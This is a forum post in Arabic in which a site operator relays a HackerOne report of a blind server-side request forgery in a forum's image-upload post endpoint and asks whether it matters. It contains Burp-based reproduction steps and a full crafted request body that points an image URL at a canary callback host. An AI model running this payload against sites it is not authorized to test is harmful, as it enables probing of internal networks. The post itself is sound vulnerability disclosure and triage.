لقد تلقينا تقريرًا من Hackerone حول المشكلة أدناه.
ما أتساءل عنه هو:
- هل هذه مشكلة؟
- هل هناك أي اقتراحات / شيء يمكنني فعله حيال ذلك؟
الملخص:
مرحبًا، لقد وجدت ثغرة SSRF عمياء في نقطة النهاية
hxxps://xyz.com/postsخطوات التكرار:
- قم بتسجيل الدخول إلى حسابك على xyz.com
- انتقل إلى الرسائل الخاصة (سيكون هناك رسالة ترحيب من discobot الخاص بهم)
- أثناء إرسال رسالة، قم بتحميل صورة واعترض الطلب في burp
- في الحمولة، قم بتغيير عنوان URL لتحميل الصورة إلى عنوان URL الخاص بـ canary الخاص بك
- ستبدو الحمولة كالتالي:
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- عند إرسال الطلب، سيتم تشغيل تنبيهي canary أو تحقق من سجلات الخادم، سيكون هناك طلب تم إجراؤه بواسطة وكيل مستخدم Ruby وواحد من مثيل Amazon Compute الخاص بهم
التأثير
تسمح الثغرة الأمنية للمهاجم بإجراء طلبات HTTP/HTTPS عشوائية داخل شبكة مثيل xyz.com.
من هذا الموضوع، يبدو أن هذا يرجع إلى سلوك onebox Server-side request forgery vulnerability.
لقد رأيت أيضًا تقرير Hackerone هذا منذ سنوات SSRF في تحميل IMG عبر URL.
شكرا!